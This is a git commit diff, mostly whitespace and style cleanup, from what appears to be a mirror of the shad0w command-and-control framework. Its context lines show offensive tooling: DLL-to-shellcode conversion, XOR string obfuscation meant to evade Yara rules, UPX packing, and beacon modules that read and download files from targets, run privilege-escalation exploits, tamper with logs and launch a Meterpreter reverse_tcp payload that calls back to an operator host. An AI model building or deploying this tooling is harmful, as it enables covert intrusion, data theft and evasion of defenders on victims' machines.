mirror of https://github.com/bats3c/shad0w
tidy code up
This commit is contained in:
parent
afede223b5
commit
4890df575c
|
@ -7,8 +7,9 @@ if sys.version_info < (3,0):
|
|||
import struct
|
||||
from struct import pack
|
||||
|
||||
MACHINE_IA64=512
|
||||
MACHINE_AMD64=34404
|
||||
MACHINE_IA64 = 512
|
||||
MACHINE_AMD64 = 34404
|
||||
|
||||
|
||||
def is64BitDLL(bytes):
|
||||
header_offset = struct.unpack("<L", bytes[60:64])[0]
|
||||
|
@ -16,16 +17,18 @@ def is64BitDLL(bytes):
|
|||
if machine == MACHINE_IA64 or machine == MACHINE_AMD64:
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
|
||||
ror = lambda val, r_bits, max_bits: \
|
||||
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
|
||||
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
|
||||
|
||||
def HashFunctionName(name, module = None):
|
||||
|
||||
def HashFunctionName(name, module=None):
|
||||
|
||||
function = name.encode() + b'\x00'
|
||||
|
||||
if(module):
|
||||
if module:
|
||||
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
|
||||
|
||||
functionHash = 0
|
||||
|
@ -53,6 +56,7 @@ def HashFunctionName(name, module = None):
|
|||
|
||||
return functionHash
|
||||
|
||||
|
||||
def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
|
||||
|
||||
#MARKER:S
|
||||
|
@ -139,7 +143,8 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
|
|||
# User data
|
||||
return bootstrap + rdiShellcode + dllBytes + userData
|
||||
|
||||
else: # 32 bit
|
||||
else:
|
||||
# 32 bit
|
||||
rdiShellcode = rdiShellcode32
|
||||
|
||||
bootstrap = b''
|
||||
|
|
|
@ -1,17 +1,20 @@
|
|||
import string
|
||||
import random
|
||||
|
||||
|
||||
def gen_rand_filename():
|
||||
name = ""
|
||||
for i in range(1, 10):
|
||||
name += random.choice(list(string.ascii_uppercase + string.ascii_lowercase))
|
||||
return name
|
||||
|
||||
|
||||
def get_size(filename):
|
||||
with open(filename, "rb") as file:
|
||||
length = len(file.read())
|
||||
return length
|
||||
|
||||
|
||||
def clean_hex_output(hex_bytes):
|
||||
raw_crypt_bytes = b""
|
||||
for byte in hex_bytes.split():
|
||||
|
@ -25,17 +28,20 @@ def clean_hex_output(hex_bytes):
|
|||
raw_crypt_bytes += bytes.fromhex(byte)
|
||||
return raw_crypt_bytes
|
||||
|
||||
|
||||
def prepare_pe_image(bytes_len, data):
|
||||
pe_image = f"#define array_len {bytes_len}\n\n"
|
||||
pe_image = f"#define array_len {bytes_len}\n\n"
|
||||
pe_image += "unsigned long long image_crypt[] = {\n"
|
||||
pe_image += data
|
||||
pe_image += "\n};"
|
||||
return pe_image
|
||||
|
||||
|
||||
def write_pe_image(path, pe_image):
|
||||
with open(path, "w") as file:
|
||||
file.write(pe_image)
|
||||
|
||||
|
||||
def write_header_file(path, keys_used, jmp=False, runpe=False):
|
||||
headerfile = ""
|
||||
with open(path, "w") as file:
|
||||
|
@ -48,6 +54,7 @@ def write_header_file(path, keys_used, jmp=False, runpe=False):
|
|||
headerfile += "void RunFromMemory(char* pImage, char* pPath);\n"
|
||||
file.write(headerfile)
|
||||
|
||||
|
||||
def write_decrypt(path, loops, enc_type="xor"):
|
||||
first_run = False
|
||||
to_write = ""
|
||||
|
@ -88,6 +95,7 @@ def write_decrypt(path, loops, enc_type="xor"):
|
|||
|
||||
return safe
|
||||
|
||||
|
||||
def clean_up(path, clean):
|
||||
with open(path, "w") as file:
|
||||
file.write(clean)
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import random
|
||||
|
||||
|
||||
class Banner(object):
|
||||
def __init__(self):
|
||||
super(Banner, self).__init__()
|
||||
|
@ -103,4 +104,4 @@ class Banner(object):
|
|||
'''` ";;;.
|
||||
"""
|
||||
|
||||
self.banners = [banner4, banner1, banner2, banner3]
|
||||
self.banners = [banner4, banner1, banner2, banner3]
|
||||
|
|
|
@ -19,6 +19,7 @@ static_warning = """Static payloads can be very large and much easier to detect.
|
|||
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
|
||||
"""
|
||||
|
||||
|
||||
def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/beacon", asm=False, backmake=False):
|
||||
# move the source files of the beacon over to the build directory
|
||||
|
||||
|
@ -36,6 +37,7 @@ def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/be
|
|||
|
||||
return
|
||||
|
||||
|
||||
def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
|
||||
# update the settings so that when we build, we will use our new args
|
||||
|
||||
|
@ -63,6 +65,7 @@ def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
|
|||
|
||||
return
|
||||
|
||||
|
||||
def _crypt_string(raw_string, key):
|
||||
# xor encrypt a string with a provided key
|
||||
crypt_string = ""
|
||||
|
@ -71,10 +74,12 @@ def _crypt_string(raw_string, key):
|
|||
|
||||
return base64.b64encode(crypt_string.encode())
|
||||
|
||||
|
||||
def _gen_key(name):
|
||||
key = hex(random.randint(0, 100))
|
||||
return f"#define {name}_KEY {key}", key
|
||||
|
||||
|
||||
def _crypt_strings():
|
||||
# encrypt strings so they are not hanging around in the binary waiting to be
|
||||
# thrown into a Yara rule. This is obfuscation not encryption
|
||||
|
@ -103,7 +108,6 @@ def _crypt_strings():
|
|||
return
|
||||
|
||||
|
||||
|
||||
def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=None, modlocation="/root/shad0w/beacon/beacon.exe", debug=False, make_target=None):
|
||||
# build the beacon from the source files, making sure to
|
||||
# obey the correct payload settings that we have been given
|
||||
|
@ -121,7 +125,8 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
|
|||
# remove the old file
|
||||
try:
|
||||
os.unlink(modlocation)
|
||||
except: pass
|
||||
except:
|
||||
pass
|
||||
|
||||
# make sure we in the correct build dir
|
||||
os.chdir(builddir)
|
||||
|
@ -161,6 +166,7 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
|
|||
|
||||
return True
|
||||
|
||||
|
||||
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
|
||||
# use Donut or srdi to extract the shellcode from our newly created beacon
|
||||
|
||||
|
@ -192,6 +198,7 @@ def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=
|
|||
|
||||
return code
|
||||
|
||||
|
||||
def write_and_bridge(filename, rcode, noremove=False):
|
||||
# write the supplied code to the file given
|
||||
# by the user and then make sure they can access it
|
||||
|
@ -210,6 +217,7 @@ def write_and_bridge(filename, rcode, noremove=False):
|
|||
|
||||
return len(rcode)
|
||||
|
||||
|
||||
def raise_issue_payload(string):
|
||||
|
||||
# throw an error with the payload string
|
||||
|
@ -218,6 +226,7 @@ def raise_issue_payload(string):
|
|||
# exit with error code
|
||||
exit(-1)
|
||||
|
||||
|
||||
def get_payload_variables(payload_string, warn=True):
|
||||
|
||||
global secure_warning, static_warning
|
||||
|
@ -271,6 +280,7 @@ def get_payload_variables(payload_string, warn=True):
|
|||
# return our generated args
|
||||
return arch, platform, secure, static
|
||||
|
||||
|
||||
def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, exploit=False):
|
||||
# make the build process quicker for modules
|
||||
|
||||
|
@ -304,6 +314,7 @@ def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, expl
|
|||
# give the shellcode back
|
||||
return rcode
|
||||
|
||||
|
||||
def shellcode_to_array(data):
|
||||
length = 0
|
||||
line_len = 0
|
||||
|
@ -389,6 +400,7 @@ def elevate_build_stage(shad0w, rootdir=None, os=None, arch=None, secure=None, f
|
|||
with open(stagefile, "w+") as file:
|
||||
file.write(stage_template)
|
||||
|
||||
|
||||
def _random_string(length):
|
||||
rstring = ""
|
||||
alphabet = string.ascii_lowercase + string.ascii_uppercase
|
||||
|
@ -398,6 +410,7 @@ def _random_string(length):
|
|||
|
||||
return rstring
|
||||
|
||||
|
||||
def shrink_exe(name):
|
||||
os.system(f"strip {name} 1>/dev/null 2>&1")
|
||||
os.system(f"upx --brute {name} 1>/dev/null 2>&1")
|
||||
|
|
|
@ -5,6 +5,7 @@ from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, \
|
|||
from pygments.token import Punctuation, \
|
||||
Text, Comment, Operator, Keyword, Name, String, Number, Generic
|
||||
|
||||
|
||||
class Shad0wLexer(RegexLexer):
|
||||
name = 'shad0w'
|
||||
aliases = ['shad0w']
|
||||
|
|
|
@ -2,6 +2,7 @@ __description__ = "Go back to the initial shell"
|
|||
__author__ = "@HashtagMarkus"
|
||||
__type__ = "beacon"
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -8,6 +8,7 @@ __description__ = "Interact with or display current beacons"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "beacon"
|
||||
|
||||
|
||||
def _list_beacons(shad0w):
|
||||
# I have gcse english, I gonna use it
|
||||
if shad0w.beacon_count == 1:
|
||||
|
@ -22,15 +23,15 @@ def _list_beacons(shad0w):
|
|||
# stuff we will display
|
||||
|
||||
# beacon number
|
||||
num = shad0w.beacons[beacon]["num"]
|
||||
num = shad0w.beacons[beacon]["num"]
|
||||
|
||||
# get last check in time
|
||||
checkin = shad0w.beacons[beacon]["last_checkin"]
|
||||
checkin = shad0w.beacons[beacon]["last_checkin"]
|
||||
|
||||
# stuff to format for name
|
||||
domain = shad0w.beacons[beacon]["domain"]
|
||||
username = shad0w.beacons[beacon]["username"]
|
||||
machine = shad0w.beacons[beacon]["machine"]
|
||||
domain = shad0w.beacons[beacon]["domain"]
|
||||
username = shad0w.beacons[beacon]["username"]
|
||||
machine = shad0w.beacons[beacon]["machine"]
|
||||
|
||||
# format of name
|
||||
if domain != "NULL":
|
||||
|
@ -44,7 +45,6 @@ def _list_beacons(shad0w):
|
|||
|
||||
print(t)
|
||||
|
||||
return
|
||||
|
||||
def _interact_beacon(shad0w, args):
|
||||
# get beacon number
|
||||
|
@ -54,7 +54,7 @@ def _interact_beacon(shad0w, args):
|
|||
try:
|
||||
interact_with = int(interact_with)
|
||||
except ValueError:
|
||||
shad0w.debug.log(f"'{interact_with}' is an invaild beacon", log=True)
|
||||
shad0w.debug.log(f"'{interact_with}' is an invalid beacon", log=True)
|
||||
return
|
||||
|
||||
# match the beacon number to the id and then set the current id as that
|
||||
|
|
|
@ -41,13 +41,13 @@ def generate_beacon_code(shad0w, beacon):
|
|||
buildtools.update_settings_file(None, custom_template=settings_template)
|
||||
|
||||
if beacon is None:
|
||||
os = shad0w.beacons[shad0w.current_beacon]["os"]
|
||||
os_ = shad0w.beacons[shad0w.current_beacon]["os"]
|
||||
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
|
||||
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
|
||||
else:
|
||||
arch, arch, secure, _ = buildtools.get_payload_variables(beacon)
|
||||
|
||||
buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True)
|
||||
buildtools.make_in_clone(arch=arch, platform=os_, secure=secure, static=True)
|
||||
|
||||
return buildtools.extract_shellcode()
|
||||
|
||||
|
|
|
@ -11,7 +11,7 @@ __description__ = "Show the contents of a file on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_LS = 0x2000
|
||||
|
||||
ERROR = False
|
||||
|
@ -23,22 +23,24 @@ def error(message):
|
|||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def cat_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
if shad0w.current_beacon is None:
|
||||
shad0w.debug.error("ERROR: No active beacon.")
|
||||
return
|
||||
|
||||
|
||||
# usage examples
|
||||
usage_examples = """
|
||||
Don't try to cat binary files, it doesnt work very well.
|
||||
|
@ -82,4 +84,4 @@ cat C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = cat_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -9,21 +9,23 @@ __description__ = "Change the working directory on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_CD = 0x6000
|
||||
|
||||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def get_list_directory(rargs, args):
|
||||
# resolve the directory we need to list
|
||||
|
@ -46,6 +48,7 @@ def cd_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# save the raw args
|
||||
|
@ -64,11 +67,11 @@ Examples:
|
|||
cd C:\\
|
||||
cd "C:\\Documents and Settings"
|
||||
"""
|
||||
|
||||
|
||||
parse = argparse.ArgumentParser(prog='ls',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
parse.error = error
|
||||
|
@ -97,4 +100,4 @@ cd "C:\\Documents and Settings"
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = cd_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -15,16 +15,18 @@ DIE_ID = 0x6000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -10,6 +10,7 @@ __type__ = "enumeration"
|
|||
|
||||
EXEC_ID = 0x3000
|
||||
|
||||
|
||||
def format_data(shad0w, data):
|
||||
data = data.splitlines()
|
||||
|
||||
|
@ -25,6 +26,7 @@ def format_data(shad0w, data):
|
|||
if "v" in line:
|
||||
shad0w.debug.log(f"-\t{line}", log=True, pre=False)
|
||||
|
||||
|
||||
def dotnet_callback(shad0w, data):
|
||||
# well its kind of true
|
||||
if "v" not in data:
|
||||
|
@ -60,4 +62,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = dotnet_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
|
|
|
@ -21,15 +21,17 @@ error_list = ""
|
|||
# name of the file to download
|
||||
FILE_TO_DOWNLOAD = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def download_callback(shad0w, data):
|
||||
global FILE_TO_DOWNLOAD
|
||||
|
@ -74,8 +76,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
|
||||
# init the parser
|
||||
parse = argparse.ArgumentParser(prog='download',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
|
@ -89,10 +91,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
args = parse.parse_args(args[1:])
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
# we need a file to read so if we don't then fail
|
||||
if len(args.file) == 0:
|
||||
print(error_list)
|
||||
print(error_list)
|
||||
parse.print_help()
|
||||
return
|
||||
|
||||
|
@ -101,10 +103,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
|
||||
# change to the dir of the folder mapped to the users current dir
|
||||
os.chdir("/root/shad0w/.bridge")
|
||||
|
||||
|
||||
# make this variable global so the call back can access it
|
||||
FILE_TO_DOWNLOAD = args.file
|
||||
|
||||
|
||||
# change back to our dir
|
||||
os.chdir(shad0w_cwd)
|
||||
|
||||
|
@ -112,7 +114,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
read_file = ' '.join(args.file).replace('\\', "\\\\").replace('"', '')
|
||||
|
||||
# clone all the source files
|
||||
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/", builddir="/root/shad0w/modules/windows/download/build")
|
||||
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/",
|
||||
builddir="/root/shad0w/modules/windows/download/build")
|
||||
|
||||
# set the correct settings
|
||||
template = """#define _C2_CALLBACK_ADDRESS L"%s"
|
||||
|
@ -125,14 +128,17 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
#define DO_CALLBACK 0x4000
|
||||
#define FILENAME "%s" """ % (shad0w.endpoint, shad0w.addr[1], shad0w.current_beacon, read_file)
|
||||
|
||||
buildtools.update_settings_file(None, custom_template=template, custom_path="/root/shad0w/modules/windows/download/build/settings.h")
|
||||
buildtools.update_settings_file(None, custom_template=template,
|
||||
custom_path="/root/shad0w/modules/windows/download/build/settings.h")
|
||||
|
||||
# compile the module
|
||||
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build", modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
|
||||
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build",
|
||||
modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
|
||||
|
||||
# get the shellcode from the module
|
||||
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe", want_base64=True)
|
||||
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe",
|
||||
want_base64=True)
|
||||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = download_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
|
|
|
@ -18,15 +18,17 @@ ERROR = False
|
|||
error_list = ""
|
||||
RAN_COMMAND = False
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def list_exploits(shad0w):
|
||||
sys.path.append("/root/shad0w/exploits/")
|
||||
|
@ -42,6 +44,7 @@ def list_exploits(shad0w):
|
|||
|
||||
print(t)
|
||||
|
||||
|
||||
def show_details(shad0w, name):
|
||||
sys.path.append("/root/shad0w/exploits/")
|
||||
all_exploits = importlib.import_module("__init__").__all__
|
||||
|
@ -56,8 +59,11 @@ def show_details(shad0w, name):
|
|||
arch = importlib.import_module(exploit.replace("/", ".")).__description__["Arch"]
|
||||
|
||||
secure = importlib.import_module(exploit.replace("/", ".")).__description__["Secure"]
|
||||
if secure: secure = "Yes"
|
||||
else: secure = "No"
|
||||
|
||||
if secure:
|
||||
secure = "Yes"
|
||||
else:
|
||||
secure = "No"
|
||||
|
||||
shad0w.debug.log("Exploit details:\n", log=True)
|
||||
shad0w.debug.log(f"Name: {exploit_name}", log=True, pre=False)
|
||||
|
@ -68,6 +74,7 @@ def show_details(shad0w, name):
|
|||
shad0w.debug.log(f"Arch: {arch}", log=True, pre=False)
|
||||
shad0w.debug.log(f"Supports Secure: {secure}", log=True, pre=False)
|
||||
|
||||
|
||||
def check_exploit(shad0w, name, arch):
|
||||
# run the exploit in check mode
|
||||
|
||||
|
@ -79,6 +86,7 @@ def check_exploit(shad0w, name, arch):
|
|||
if name == exploit_name:
|
||||
importlib.import_module(exploit.replace("/", ".")).check(shad0w, arch)
|
||||
|
||||
|
||||
def use_exploit(shad0w, name, arch):
|
||||
# run the exploit in exploit mode
|
||||
|
||||
|
@ -91,6 +99,7 @@ def use_exploit(shad0w, name, arch):
|
|||
exploit_mod = importlib.import_module(exploit.replace("/", "."))
|
||||
threading.Thread(target=exploit_mod.exploit, args=(shad0w, arch)).start()
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
global RAN_COMMAND
|
||||
|
||||
|
@ -113,8 +122,8 @@ elevate --smart
|
|||
|
||||
# init the parser
|
||||
parse = argparse.ArgumentParser(prog='elevate',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
|
@ -163,4 +172,3 @@ elevate --smart
|
|||
|
||||
if RAN_COMMAND == False:
|
||||
parse.print_help()
|
||||
return
|
|
@ -2,12 +2,13 @@
|
|||
# exit shad0w
|
||||
#
|
||||
|
||||
import os, signal
|
||||
import sys
|
||||
|
||||
__description__ = "Exit shad0w C2"
|
||||
__author__ = "@_batsec_"
|
||||
__type__ = "system"
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
# Once we have logging we will probably want to make a more sophisticated exit routine
|
||||
os.sys.exit(0)
|
||||
sys.exit(0)
|
||||
|
|
|
@ -8,14 +8,16 @@ __description__ = "Show current process info"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "process"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_PID = 0x7000
|
||||
|
||||
|
||||
def pid_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -29,4 +31,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = pid_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -25,17 +25,18 @@ RUBEUS_BIN = "/root/shad0w/bin/gitl.x64.exe"
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def ghostinthelogs_callback(shad0w, data):
|
||||
data = data.replace("[+]", "\033[1;32m[+]\033[0m")
|
||||
data = data.replace("[!]", "\033[1;31m[!]\033[0m")
|
||||
|
@ -47,6 +48,7 @@ def ghostinthelogs_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def set_and_send(shad0w, args):
|
||||
args.cls = False
|
||||
args.method = False
|
||||
|
@ -65,6 +67,7 @@ def set_and_send(shad0w, args):
|
|||
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
raw_args = args
|
||||
|
|
|
@ -10,6 +10,7 @@ __description__ = "Show help information"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "system"
|
||||
|
||||
|
||||
def usage(shad0w):
|
||||
t = PrettyTable(["Type", "Command", "Description"])
|
||||
|
||||
|
@ -28,7 +29,7 @@ def usage(shad0w):
|
|||
|
||||
try:
|
||||
description = mod.__description__
|
||||
except:
|
||||
except Exception:
|
||||
description = "No description available."
|
||||
|
||||
t.add_row([type, command, description])
|
||||
|
@ -37,6 +38,7 @@ def usage(shad0w):
|
|||
|
||||
return t
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
info = usage(shad0w)
|
||||
shad0w.debug.log(info, pre=False, log=True)
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of lockless binary
|
||||
LOCKLESS_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/LockLess.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def lockless_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -15,16 +15,18 @@ OPCODE_LS = 0x1000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def get_list_directory(rargs, args):
|
||||
# resolve the directory we need to list
|
||||
|
||||
|
@ -46,6 +48,7 @@ def ls_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# save the raw args
|
||||
|
@ -67,9 +70,9 @@ ls "C:\\Documents and Settings"
|
|||
"""
|
||||
|
||||
parse = argparse.ArgumentParser(prog='ls',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
parse.error = error
|
||||
|
@ -99,4 +102,4 @@ ls "C:\\Documents and Settings"
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = ls_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -12,19 +12,19 @@ __type__ = "module"
|
|||
|
||||
EXEC_ID = 0x3000
|
||||
|
||||
|
||||
class DummyClass(object):
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
# Let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
#global ERROR, error_list
|
||||
#ERROR = True
|
||||
print(f"\033[0;31m{message}\033[0m\n")
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def msfvenom_payload_gen(shad0w, payload, lport, lhost, arch):
|
||||
|
@ -66,7 +66,7 @@ def main(shad0w, args):
|
|||
# Setup the args, set default='' to show help message when missing
|
||||
parser.add_argument("--port", required=True, help="Port you would like Metasploit to call")
|
||||
parser.add_argument("--host", required=True, help="Host/IP you would like Metasploit to call")
|
||||
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp",required=False, default="windows/x64/meterpreter/reverse_tcp")
|
||||
parser.add_argument("--payload", help="What Metasploit payload you would like to deploy, default: windows/x64/meterpreter/reverse_tcp", required=False, default="windows/x64/meterpreter/reverse_tcp")
|
||||
|
||||
# Make sure we don't die from weird args
|
||||
try:
|
||||
|
@ -85,7 +85,7 @@ def main(shad0w, args):
|
|||
return
|
||||
|
||||
# Generate and read the msfvenom shellcode
|
||||
rcode = msfvenom_payload_gen(shad0w, payload = args.payload, lport = args.port, lhost = args.host, arch="x64")
|
||||
rcode = msfvenom_payload_gen(shad0w, payload=args.payload, lport=args.port, lhost=args.host, arch="x64")
|
||||
|
||||
# Set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
|
|
|
@ -21,15 +21,17 @@ DLLINJECT_EXEC_ID = 0x5000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
